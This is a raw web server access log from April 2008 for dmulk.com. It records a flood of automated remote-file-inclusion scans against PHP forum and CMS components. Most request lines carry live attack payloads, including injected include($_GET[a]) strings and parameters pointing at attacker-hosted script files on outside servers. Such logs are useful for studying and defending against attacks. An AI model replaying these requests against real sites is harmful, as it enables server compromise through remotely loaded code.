200.30.73.117 - - [23/Apr/2008:12:39:53 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:57 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:02 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:12:40:07 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:12:40:09 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:12:40:10 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:40:11 -0700] "GET /logs/access_080215.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:11 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.185.17 - - [23/Apr/2008:12:40:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.249.185.17 - - [23/Apr/2008:12:40:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [23/Apr/2008:12:40:27 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.238.225.165 - - [23/Apr/2008:12:40:27 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:34 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:40:41 -0700] "GET /logs/access_080218.log/modifyform.html?code=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:40:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:41:01 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:41:08 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:41:09 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:41:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:41:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:41:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:41:34 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:41:34 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:42:24 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:42:31 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:12:42:32 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:12:42:32 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:12:42:36 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:42:39 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:42:39 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://redrumfans.com/id?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:42:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:43:57 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:43:57 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:43:58 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:44:01 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:44:01 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:44:08 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:44:30 -0700] "GET /?thisdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:44:34 -0700] "GET /?svr_rootP=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
80.86.84.169 - - [23/Apr/2008:12:44:34 -0700] "GET /logs/access.log/errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [23/Apr/2008:12:44:35 -0700] "GET /errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [23/Apr/2008:12:44:35 -0700] "GET /logs/errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:44:39 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:44:40 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:44:41 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:44:45 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:44:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:44:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:44:47 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:44:50 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:44:52 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:44:53 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:44:57 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:05 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:06 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:08 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:09 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:09 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:09 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:11 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:12 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:12 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:45:16 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:12:45:17 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.8.70 - - [23/Apr/2008:12:45:18 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:22 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:12:45:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.8.70 - - [23/Apr/2008:12:45:23 -0700] "GET //Neos_Chronos/header.php?base_folder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:45:27 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
200.244.71.2 - - [23/Apr/2008:12:45:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:45:28 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:45:29 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
81.31.8.70 - - [23/Apr/2008:12:45:29 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.104.114 - - [23/Apr/2008:12:45:30 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:45:31 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.104.114 - - [23/Apr/2008:12:45:31 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:45:32 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:32 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:33 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:33 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:45:33 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:34 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:45:34 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:34 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:45:35 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:45:38 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.104.114 - - [23/Apr/2008:12:45:38 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:45:39 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.18.104.114 - - [23/Apr/2008:12:45:39 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:44 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:45 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:45:45 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:45:54 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:45:55 -0700] "GET /logs/config.php?path_to_root=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:45:56 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:12:45:59 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:46:00 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:46:06 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:46:09 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:46:12 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:46:13 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.221.184.148 - - [23/Apr/2008:12:46:20 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.51.187 - - [23/Apr/2008:12:46:26 -0700] "GET /retreat1/webcam/?M=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:12:46:29 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:46:35 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:46:35 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:46:35 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:46:36 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
